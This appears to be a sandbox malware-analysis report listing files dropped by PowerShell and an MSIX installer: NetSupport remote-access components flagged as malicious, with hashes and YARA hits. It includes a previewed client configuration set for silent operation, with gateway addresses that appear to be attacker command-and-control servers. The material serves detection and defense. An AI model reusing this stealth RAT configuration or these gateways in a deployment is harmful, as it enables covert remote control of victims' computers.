                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):259
                                                                                                                Entropy (8bit):5.058986594877512
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:O/oP54xRPjwxVshvydDKHMoEEjLgpW2MWMf651XZNWYpPM/iooZa8l6i7s:X0R7wxQJjjqW2MWMf65TNBPM/io98l6J
                                                                                                                MD5:1DC87146379E5E3F85FD23B25889AE2A
                                                                                                                SHA1:B750C56C757AD430C9421803649ACF9ACD15A860
                                                                                                                SHA-256:F7D80E323E7D0ED1E3DDD9B5DF08AF23DCECB47A3E289314134D4B76B3ADCAF2
                                                                                                                SHA-512:7861ABE50EEFDF4452E4BAACC4B788895610196B387B70DDEAB7BC70735391ED0A015F47EADA94A368B82F8E5CEDB5A2096E624F4A881FF067937AD159E3562C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:1200..0xdb3e38e....; NetSupport License File...; Generated on 00:48 - 19/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=MGJFFRT466..maxslaves=100000..os2=1..product=10..serial_no=NSM301071..shrink_wrap=0..transport=0..
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18808
                                                                                                                Entropy (8bit):6.22028391196942
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\PCICHEK.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3710280
                                                                                                                Entropy (8bit):6.518204410536431
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:xOHDe5Yr6tYA4S+DjdwfwBTNZaZQclSpmTIH:xOHDe5YrvS+tBQSEm
                                                                                                                MD5:AD51946B1659ED61B76FF4E599E36683
                                                                                                                SHA1:DFE2439424886E8ACF9FA3FFDE6CAAF7BFDD583E
                                                                                                                SHA-256:07A191254362664B3993479A277199F7EA5EE723B6C25803914EEDB50250ACF4
                                                                                                                SHA-512:6C30E7793F69508F6D9AA6EDCEC6930BA361628EF597E32C218E15D80586F5A86D89FCBEE63A35EAB7B1E0AE26277512F4C1A03DF7912F9B7FF9A9A858CF3962
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\netsupport\client\PCICL32.DLL, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\PCICL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):391832
                                                                                                                Entropy (8bit):6.788660116314725
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
                                                                                                                MD5:405A7BCA024D33D7D6464129C1B58451
                                                                                                                SHA1:22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
                                                                                                                SHA-256:092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
                                                                                                                SHA-512:3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\TCCTL32.DLL, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):55456
                                                                                                                Entropy (8bit):3.9089814840046824
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:HtvrImfzoXK6DDvvvDvpvZMt+pan/opgRl2:lImfzoXK9/o66
                                                                                                                MD5:9497AECE91E1CCC495CA26AE284600B9
                                                                                                                SHA1:A005D8CE0C1EA8901C1B4EA86C40F4925BD2C6DA
                                                                                                                SHA-256:1B63F83F06DBD9125A6983A36E0DBD64026BB4F535E97C5DF67C1563D91EFF89
                                                                                                                SHA-512:4C892E5029A707BCF73B85AC110D8078CB273632B68637E9B296A7474AB0202320FF24CF6206DE04AF08ABF087654B0D80CBECFAE824C06616C47CE93F0929C9
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\client32.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):631
                                                                                                                Entropy (8bit):5.391705768502912
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:ix/vONhH+9GSyDHlsVTXuZ7/PfY8ADfDWQCYubluyzWqTLuGY:ipOhe9CHlLl1ufD/uL6qHuf
                                                                                                                MD5:ADFFA0C2FEDB1506087178C51EFBD377
                                                                                                                SHA1:A3218FA2FBEFAA5447B970481A575FCDEA0BD2F7
                                                                                                                SHA-256:6B115C0C710BB0DFB234D297B0E8A862D8AFF972CE9915B3FDFBC4D12A698D6F
                                                                                                                SHA-512:2284360ED332D66856C8A78698D1A4AD4D9919F3D1E08E5C6A648391C529EBEF66B1AF081EC88EFBE9BCD68375B2243D76BF5532CDA5F831642FEF4B1CA57F07
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:0x553755d7....[Client].._present=1..AlwaysOnTop=0..AutoICFConfig=1..DisableChat=1..DisableChatMenu=1..DisableDisconnect=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..Protocols=3..Shared=1..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\Users\Public\Pictures\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=5.8.63.140:443..GSK=GB;E>BBOGO<L@JDAFB:P?NBHGH:L?D..SecondaryGateway=185.174.102.62:443..SecondaryPort=443..
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):773968
                                                                                                                Entropy (8bit):6.901559811406837
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Windows setup INFormation
                                                                                                                Category:dropped
                                                                                                                Size (bytes):328
                                                                                                                Entropy (8bit):4.93007757242403
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):46
                                                                                                                Entropy (8bit):4.532048032699691
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):33144
                                                                                                                Entropy (8bit):6.737780491933496
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\netsupport\client\pcicapi.dll, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):63320
                                                                                                                Entropy (8bit):6.439464682558898
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:bJfanvXuN86jJ9hUHYBlXUYwT24a+yVwQ:lanPGjJTU4IYia+yVX
                                                                                                                MD5:35DA3B727567FAB0C7C8426F1261C7F5
                                                                                                                SHA1:B71557D67BCD427EF928EFCE7B6A6529226415E6
                                                                                                                SHA-256:89027F1449BE9BA1E56DD82D13A947CB3CA319ADFE9782F4874FBDC26DC59D09
                                                                                                                SHA-512:14EDADCEECEB95F5C21FD3A0A349DD2A312D1965268610D6A6067049F34E3577FC96F6BA37B1D6AB8CE21444208C462FA97FAB24BBCD77059BC819E12C5EFC5A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2254634
                                                                                                                Entropy (8bit):7.9971005277446485
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:49152:x7VQNflTPMa/OxjJ1hQKa/ZK770FH244xSbBVLmLELJ6QWT:ZePMa/OxhF46YFH2HSbnCLQS
                                                                                                                MD5:D9B6C10970B94D21E3F2077B54A63818
                                                                                                                SHA1:98F404CB5CE1D0D90A56F20377DF3861F2164C25
                                                                                                                SHA-256:7441C425B0EC105239414AF3341A42A5D0F9D4FD9495DB03D48746D9914AB438
                                                                                                                SHA-512:C24BBFF0A5928C8679A7E2F09457CE4FC56DFA31FA02C9C8FEE16FFB1D287805956AB70C373F58713CF85D1EC0A477BC8AC793FF153AE8EB422B0B776C83EC4A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PK.........X.............. .client/UT...J=.fL=.fJ=.fux.............PK........m.zX........w..... .client/client32.iniUT...~..fJ=.fJ=.fux.............]Q.n.@.|G.G...6v......S.!}.#..k.....;....#(......hn...p...f.:..p..<..U.q$..D...:..l...3r...)N.l.+..3..B.'...(..R...u.hM.p....t.......o-[(id-.&S.)/TAci......d3..yy.....+/....Q.+E{;>..i.1....Uj......|q...&j..J.....,.x.....6..I.<.K}(.g..C.j......N:...~.c5..x..1.^.t.5.Z.}.....Q...E9Jb..A3q.[..P...MU..M.bK.H.....1?...o>........'i...8...v...*Z....W.I7....K.......Hp.z.b....O.>D.T...?PK..C..?....w...PK........J.nX........xm.... .client/AudioCapture.dllUT...<3.e...f.g.eux...............|SE.0~.....PZ.R.HE...R..B.R.BBmJ........{.W.eo..r.....+....vw]...6.m.Q..h..U..b....z...$iR....>.......{g..3gf.s.GJo...9...O.9..c...K.#.7f...p/..1.......US...k./.;...).{.j....?.hyY.}..[.]j....k.......;/...go......]A.W...s..Ma~5o.....?;k...y.&....7.....r#.0..;.-5$r.m.Gy8..K.:..q.B...........Pn..N..P..7P.....,.%..^....k......
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12365
                                                                                                                Entropy (8bit):4.92618019298323
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:3Vib4uWGPVoGIpN6KQkj2kkjh4iUx/UpucYKib4o:3GWGPV3IpNBQkj2Nh4iUx/UpucYR
                                                                                                                MD5:05B33D51AE63729F598F931152C2954F
                                                                                                                SHA1:35D2E60083473EB4AC1227675D4CF7D22C41A4A7
                                                                                                                SHA-256:D83566BB9BE1FDB91C53DD75825B5B39C88003054CA24FD8596E98CB7ACA7B2C
                                                                                                                SHA-512:B7B0F717164F54F2DE7E34C76717436CF49A6212B7300BC9AF1CE07C296B6F57938C176D7F4661C931005A50CA8BB70ADC152791AA1AA55018A52D072DE08451
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):20296
                                                                                                                Entropy (8bit):5.66777380461305
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:y5jrz5B0MufPpRipvHn4vr7YSvBSHFQuqUKb3+rqHBcsLCYjVL7BOUxMlplE:CrsME4avrESvSa/tr7CwVL7t6lo
                                                                                                                MD5:E1256E2C30ED3D6D3E7B29A225162A1B
                                                                                                                SHA1:973179FEF2DDC6F5262B601572760132C21D2505
                                                                                                                SHA-256:E030FB688FCC941388AD898DD27D04F9623DED8B855839711A65665AFB92ED28
                                                                                                                SHA-512:100E7733C19505354FDB35E3970399A64F2838146EE4661541EE1915E3FA518FE64E8ED225C344ECD7CD472183A8F6B378C1DEA735FA499E202A714DE5EEB690
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:@...e...............6...........5.....N...r.....................H...............o..b~.D.poM...4..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....%.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.H...............RZ.zI..@..9..lD.........Microsoft.PowerShell.Activities.T...............T....I..,....d#.....).Microsoft.PowerShell.Workflow.Se
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4883
                                                                                                                Entropy (8bit):7.62020807561374
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:lQNvGR7mkSZY8nic4MCyTpG/GB6ii8IzIBae2LEgShh:2vE6kSDnicMp/Q6ii8GbIhh
                                                                                                                MD5:7D82356CA0C82928CAE8164AD50FE4FA
                                                                                                                SHA1:FF16792B2DD93056DE10AF08A5A3E21A99DDDCC6
                                                                                                                SHA-256:568FA08C595B210B08EB9DB3141A8BF9AE29518B2604C9B4D0283BF62A1B2D6A
                                                                                                                SHA-512:EDCE5216F6A6D3F7462B3629FDC3DF44EEB01938C9B9E8FDE1164159E2285FC19F8AF80F6D27AC70C0C3F2C94F40577AFFCCE49C68D291D513AAC95DBFC64389
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (454), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2286
                                                                                                                Entropy (8bit):5.433441056469513
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:3jRATANBAN3AMAWH6z8Nz0NgjFTJ1zx5slE5pDCbB/uzD2uu3uzjzfov62PoGz:TRATANBAN3AMAy6INRFFAE5pOb0zD2uS
                                                                                                                MD5:96F7351744D6634543522C06A3BAC5B3
                                                                                                                SHA1:B480858E7965127B80628F41B1CB0693F42B526D
                                                                                                                SHA-256:294B778D99A84C1ECC82CC82013C94EF4E19F563F03986BD0FB12E2D9C1B88E8
                                                                                                                SHA-512:C780AD5444AB5A0EC96169E8E0956A642DE7D73E05CBE3FF6877CA1A12BFBCA898731DC7EB2C63A8E37D7F4B73BF1BBF5B41C4BD68FF9A52B89D4A7216287A93
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:uap10="http://schemas.microsoft.com/appx/manifest/uap/windows10/10" xmlns:desktop7="http://schemas.microsoft.com/appx/manifest/desktop/windows10/7" xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities" IgnorableNamespaces="uap uap10 desktop7 rescap">.. Package created by MSIX Packaging Tool version: 1.2023.1005.0-->.. <Identity Name="WSJ" Publisher="E=admin@softwarepoland.com, CN=SOFTWARE SP Z O O, O=SOFTWARE SP Z O O, STREET=UL. PULAWSKA 538, L=WARSZAWA, S=MAZOWIECKIE, C=PL, OID.1.3.6.1.4.1.311.60.2.1.3=PL, SERIALNUMBER=0000682860, OID.2.5.4.15=Private Organization" Version="4.12.77.0" ProcessorArchitecture="x64" />.. <Properties>.. <DisplayName>WSJ</DisplayName>.. <PublisherDisplayName>WSJ</PublisherDisplayName>.. <Descriptio
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (4464), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4520
                                                                                                                Entropy (8bit):5.872791821604633
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:aLVTL/K2vDd56Lhu2GpL8cdjojlUmwkCzGiNNpzh1gHmn4:2H/K2vDd56FGDcjlJwzGi5zh1mmn4
                                                                                                                MD5:B3D4042B64606093790944886F6934E2
                                                                                                                SHA1:5EE47CD14FD471F84068AA9CAC0C2E3CC0F18F65
                                                                                                                SHA-256:8308B56B83F71E6E6658BD4EB49C3892B4F1A0FF6B1D090AF80D697A591C5B06
                                                                                                                SHA-512:96CDAD4A50E0C7DA9D7E493158C623270E90FB3A6405B35F987FDC5BE2E4E14B1E6E89F8F95BAA2482301F2172F2FE093E837A4A345E20EF7D5643EF39F2AEEC
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<BlockMap xmlns="http://schemas.microsoft.com/appx/2010/blockmap" xmlns:b4="http://schemas.microsoft.com/appx/2021/blockmap" IgnorableNamespaces="b4" HashMethod="http://www.w3.org/2001/04/xmlenc#sha256"><File Name="Registry.dat" Size="49152" LfhSize="42"><Block Hash="G4jbvtijEzAIwzqfWjHJjrM12wgTaISZNWfiBSr7Kc8=" Size="11090"/></File><File Name="User.dat" Size="20480" LfhSize="38"><Block Hash="9ZLZtias4ziA/vGSxlIy9on36EuAmeWWSzjWRguOlRI=" Size="4769"/></File><File Name="Assets\logo.png" Size="3659" LfhSize="45"><Block Hash="CmRUX2Mq1Flp9iu9jiujmCCpWefOo+rN+aclBy/37To=" Size="3645"/></File><File Name="config.json" Size="363" LfhSize="41"><Block Hash="dkIDkZzNgEGOgvRcQCIpQ3Z4vmSOXysvqLK3YvHhXpE=" Size="227"/></File><File Name="tOUKLPvSz.ps1" Size="5972" LfhSize="43"><Block Hash="GRqHZtqYsfmSByBFkFz4LHcdjLn2l9CIc2hneNxwx/Y=" Size="1756"/></File><File Name="PsfLauncher32.exe" Size="309680" LfhSize="47"><Block Hash="d/RZmV8GU+7muFwL9+c1
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6112
                                                                                                                Entropy (8bit):7.482666373512879
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:213iHAUCbBz4R7mkSZY8nic4MCyTpG/GB6ii8IzIBaWyyd9Db:2RFW6kSDnicMp/Q6ii8GJyPf
                                                                                                                MD5:11BF9AC5BD7C0A23C4C8AB7D130D066D
                                                                                                                SHA1:7DA13AB8263D173D78362858597BFAECE0DC7FED
                                                                                                                SHA-256:8F76635B4EDD6B693DDF16FADE7688EA7F0C4E43896F41D0D0FCF41EEBF55190
                                                                                                                SHA-512:1C64FC2FB7A5D5A5CC35CDFFF9BDC397561334C3AF335A3EA962CDFA3E6851573C95E3FEB120F1B611F4C8CB3546CC17EA1FDD301065FC3ECECB2019F2A1EB82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5176
                                                                                                                Entropy (8bit):4.738584155977204
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:WPDIBImIIIFICItiIPIuiImIjiIxIUiIYIpiIS6/37LCOXT4aICInowoq8RI6I64:WP5I7j0Xowoq8NqsOqC
                                                                                                                MD5:CE102C4B1736BF61F34E14F0173FEE89
                                                                                                                SHA1:D166E454CA33520E0C76EFECADAC0224B93E60CC
                                                                                                                SHA-256:AE0E328618800983358B154262102EA2E73823108D7F86C62A37DC91377F5DF3
                                                                                                                SHA-512:5F3BFA7F4F12047A95B71A44DA3F1CD06357D0A06B8257EDED0DE40FD1E6D650F892A529F6AE9368E4AC5B6F9B5A17213FB5F641500F6A6075D1CF5C4A8C05A3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:mrm_pri2....8... ...............[mrm_decn_info].............0...[mrm_pridescex].........0...`...[mrm_hschemaex] ................[mrm_res_map2_].........x.......[mrm_dataitem] .........P...`...[mrm_dataitem] .............`...[mrm_dataitem] .............`...[mrm_dataitem] .........p...`...[mrm_dataitem] .............(...[mrm_dataitem] .............p...[mrm_dataitem] .........h.......[mrm_dataitem] .............p...[mrm_dataitem] .........X.......[mrm_dataitem] .............p...[mrm_dataitem] .........H.......[mrm_dataitem] .............p...[mrm_dataitem] .........8.......[mrm_dataitem] .............p...[mrm_dataitem] .........(.......[mrm_decn_info].........0...............-...................................................................................................V.......}.............................,.......d.......,.......,.......,.......,.............................................................................................................!...........$...........(.......
                                                                                                                Process:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):3518
                                                                                                                Entropy (8bit):5.363194534471609
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:SJHjzL0GoglflglfbvxiKJETBONZ8W30SdH:4DzL0GoglflglfbZETBONZ8WhH
                                                                                                                MD5:E1A8C6E39C631AC02F1D0D19077F4009
                                                                                                                SHA1:36D0C40DE020991F2E583CAAEC354B9A0CEF6356
                                                                                                                SHA-256:747F32C2A41B6C2C7E3FFE1CE256429C0F38B6B6FD73EE8375E1293A7203D423
                                                                                                                SHA-512:DF95C826D6C5AC41014D8B1A6C369F49F2895FC52E77B0E41F756440155E5B6744829FEBCAA5485B760B9EACFA09C82A969C6FF97FD609CF5082AA3BE5D23F58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
